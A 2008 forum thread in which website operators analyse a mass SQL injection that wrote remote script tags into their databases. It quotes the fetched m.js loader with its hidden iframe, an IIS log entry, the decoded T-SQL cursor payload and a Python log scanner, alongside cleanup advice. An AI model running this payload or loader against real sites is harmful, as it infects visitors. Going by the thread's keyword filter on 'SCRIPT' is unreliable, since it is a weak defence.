May 20th, 2008

SQL Injection

We recently had an MSSQL injection on our server and don't know why it happened. We got a funny email in our ticket center, which is at another data center, saying we have an exploit in our code, and then two hours later the server got hacked through our ASP code, and then we have multiple SQL injections of this random string in some tables.

"<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.dot<script src=http://www.dota11.cn/m.js></script>
<script src=http://www.qiq<script src=http://www.dota11.cn/m.js></script>"

If the code won't allow special characters as input into database writes, how can a person do a SQL injection by phrasing off a compiled DLL file that doesn't accept file attachments?
Posted by domeger
May 20th, 2008

Re: SQL Injection

I don't know about this kind of thing but if you go to
http://www.dota11.cn/m.js

this is the file that you get; maybe it sheds some light on what happened.

// Browsers reporting a Simplified Chinese locale only get a 51yes.com hit counter...
if (navigator.systemLanguage=='zh-cn')
{
document.writeln("<script language=\"javascript\" src=\"http:\/\/count40.51yes.com\/click.aspx?id=408936399&logo=1\"><\/script>");
}
// ...every other visitor gets a zero-height (invisible) iframe loading dj.htm from the same host.
else{
document.writeln("<iframe src=http:\/\/www.dota11.cn\/dj.htm width=100 height=0><\/iframe>");
}

// Swallow any script errors so the visitor sees nothing unusual.
window.onerror=function(){return true};
document.write ('<script>var a3070tf="51la";var a3070pu="";var a3070pf="51la";var a3070su=window.location;var a3070sf=document.referrer;var a3070of="";var a3070op="";var a3070ops=1;var a3070ot=1;var a3070d=new Date();var a3070color="";if (navigator.appName=="Netscape"){a3070color=screen.pixelDepth;} else {a3070color=screen.colorDepth;}<\/script><script>a3070tf=top.document.referrer;<\/script><script>a3070pu =window.parent.location;<\/script><script>a3070pf=window.parent.document.referrer;<\/script><script>a3070ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3070ops=(a3070ops==null)?1: (parseInt(unescape((a3070ops)[2]))+1);var a3070oe =new Date();a3070oe.setTime(a3070oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3070ops+ ";path=/;expires="+a3070oe.toGMTString();a3070ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3070ot==null){a3070ot=1;}else{a3070ot=parseInt(unescape((a3070ot)[2])); a3070ot=(a3070ops==1)?(a3070ot+1):(a3070ot);}a3070oe.setTime(a3070oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3070ot+";path=/;expires="+a3070oe.toGMTString();<\/script><script>a3070of=a3070sf;if(a3070pf!=="51la"){a3070of=a3070pf;}if(a3070tf!=="51la"){a3070of=a3070tf;}a3070op=a3070pu;try{lainframe}catch(e){a3070op=a3070su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=15&id=1893070&tpages=\'+a3070ops+\'&ttimes=\'+a3070ot+\'&tzone=\'+(0-a3070d.getTimezoneOffset()/60)+\'&tcolor=\'+a3070color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3070of)+\'&vpage=\'+escape(a3070op)+\'" \/>\');<\/script>');
Last edited by compdoc; May 20th, 2008 at 11:34 am.
Posted by compdoc
May 22nd, 2008

Re: SQL Injection

I'd be interested if anyone has a solution to this problem as we're suffering much the same thing - our m.js files are coming from a slightly different URL, but the end result is the same.
Posted by Athersgeo
May 25th, 2008

Re: SQL Injection

Quote originally posted by Athersgeo:
    I'd be interested if anyone has a solution to this problem as we're suffering much the same thing - our m.js files are coming from a slightly different URL, but the end result is the same.
This seems to have worked for me on a supposedly SQL Injection-proofed ASP website that was being attacked; hopefully it will work for you.

- Clean the data; restore from the last known good backup.
- Immediately set the database properties to Read-only=True (right-click the database name in SQL Server Management Studio, select Properties, edit the Read-only property, save the settings).
- Examine the IIS logs, searching for the domain that is showing up in the malicious script statements (in my case, dota11). The lines in the IIS logs that contain the script statement should point you toward the ASP file that is vulnerable.
- Fix the ASP code. In my case, a request variable was being directly used by the code without being checked, and that is how the attack was inserting the malicious script. I added a call to InStr(UCASE(requestVariable),"SCRIPT") to filter out any values containing scripts.
- Re-enable the database to Read-only=True after being reasonably sure that the ASP code is no longer vulnerable.
Posted by circa66
May 27th, 2008

Re: SQL Injection

Thanks for the suggestions; unfortunately, at least so far, there's nothing cropping up in the IIS logs to give us a hint of which page is open - which suggests they're not using an insecure querystring to do the damage, but somehow managing to pass the data as form data.

Given all the sites that have been affected (at least so far) have no public write access to the database (only read), and the content management system uses a combination of passwords and session variables to prevent unwanted access, this is getting both more puzzling - and more worrying - by the minute.

ETA - The search has finished and it has brought to light another site that's been affected. This one does have some public write access to the database (bookings and whatnot), but that's run through a fairly strict injection trap to prevent unwanted SQL commands (as are any querystrings, come to that!), while the maintenance is hidden behind an NT logon, so in theory, this shouldn't be possible...
Last edited by Athersgeo; May 27th, 2008 at 10:50 am.
Posted by Athersgeo
May 28th, 2008

Re: SQL Injection

I'm getting the exact same type of injection.
Right now I'm running a search and replace on the entire DB to see how many tables/columns this has changed.

Please do share if you have any update to this.

Thanks.
Posted by ticker
May 30th, 2008

Re: SQL Injection

Update: found this in the IIS logs:

2008-05-23 00:15:23 W3SVC655445 190.000.0.0 POST /display.asp EntryId=8;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(...|324|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Incorrect_syntax_near_';'. 80 - 58.215.65.96 Mozilla/3.0+(compatible;+Indy+Library) - - 500 0 0


They're targeting a SELECT statement in the ASP file, not an UPDATE or SELECT, and the file does not contain a form.

If you decode the CAST values, here is the actual SQL that is being injected:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+'
]))+''<script src=http://c.uc8010.com/0.js></script>''')FETCH NEXT FROM
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T
varchar(255),@C

I've changed the ASP code to check the command line parameter value to make sure that it is numeric before passing it to a SELECT statement in the code.

EntryId = Request("EntryId")
If Not IsNumeric(EntryId) Then
    ' bail and deploy SQL injection countermeasures
    Response.End
End If


So, maybe try searching your IIS logs for DECLARE or NVARCHAR or CAST and see what you come up with?
Posted by circa66
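An added example, not code from the thread or its posters: a Python script that does what circa66's two posts describe (the May 25th step of combing IIS logs for the attack, and the May 30th advice to grep for DECLARE/NVARCHAR/CAST and decode the CAST hex into the real SQL). The log lines, IP addresses and hex payload below are constructed, and the script assumes the W3C field order of the log line quoted in the thread.

```python
import re
from urllib.parse import unquote

# Markers the thread suggests grepping IIS logs for, plus EXEC( which runs the decoded string.
MARKERS = ("DECLARE", "CAST(", "NVARCHAR", "EXEC(")
# CAST(0x... AS NVARCHAR(n)) or CAST(0x... AS VARCHAR(n)); group 2 tells us which.
HEX_CAST = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR\(\d+\)\)", re.I)

def decode_cast_hex(hexstr, is_nvarchar):
    """NVARCHAR hex is UTF-16LE text; VARCHAR hex is single-byte text."""
    raw = bytes.fromhex(hexstr)
    return raw.decode("utf-16-le" if is_nvarchar else "latin-1")

def scan_line(line):
    """Assumes the W3C field order of the thread's sample line:
    date time site s-ip method stem query port user c-ip ua ... status sub win32."""
    f = line.split()
    if line.startswith("#") or len(f) < 14:
        return None
    query = unquote(f[6])            # IIS logs the query string %-encoded
    hits = [m for m in MARKERS if m in query.upper()]
    if not hits:
        return None
    decoded = [decode_cast_hex(h, bool(n)) for h, n in HEX_CAST.findall(query)]
    return {"client_ip": f[9], "uri": f[5], "status": f[-3],
            "markers": hits, "decoded": decoded}

def scan_log(lines):
    return [r for r in map(scan_line, lines) if r]

# --- constructed sample data (not from the thread) ---
INJECTED_SQL = ("update [Items] set [Title]=rtrim(convert(varchar,[Title]))"
                "+'<script src=http://attacker.invalid/0.js></script>'")
PAYLOAD_HEX = INJECTED_SQL.encode("utf-16-le").hex().upper()
QUERY = ("EntryId=8;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + PAYLOAD_HEX
         + "%20AS%20NVARCHAR(4000));EXEC(@S);--")
SAMPLE_LOG = [
    "2008-05-23 00:10:02 W3SVC655445 192.0.2.10 GET /display.asp EntryId=8 80 - "
    "203.0.113.5 Mozilla/4.0+(compatible;+MSIE+7.0) - - 200 0 0",
    "2008-05-23 00:15:23 W3SVC655445 192.0.2.10 POST /display.asp " + QUERY + " 80 - "
    "203.0.113.7 Mozilla/3.0+(compatible;+Indy+Library) - - 500 0 0",
]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r["client_ip"], r["uri"], r["status"], ", ".join(r["markers"]))
        for sql in r["decoded"]:
            print("  decoded:", sql)
```

Run it against a real ex*.log file by reading its lines into scan_log; the decoded SQL names the table/column pattern to clean and the uri field names the ASP page to fix.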
May 31st, 2008

Re: SQL Injection

We have found that in several logs besides the affected sites, BUT, not found it in the logs for all the affected sites - which had made us a little iffy on whether the two things were connected, or whether it was two sets of people attempting to do unpleasant things to our server. We've already taken some steps to block that SQL anyway, but with that decode, that makes things a lot clearer.

Thank you very, very much!
Posted by Athersgeo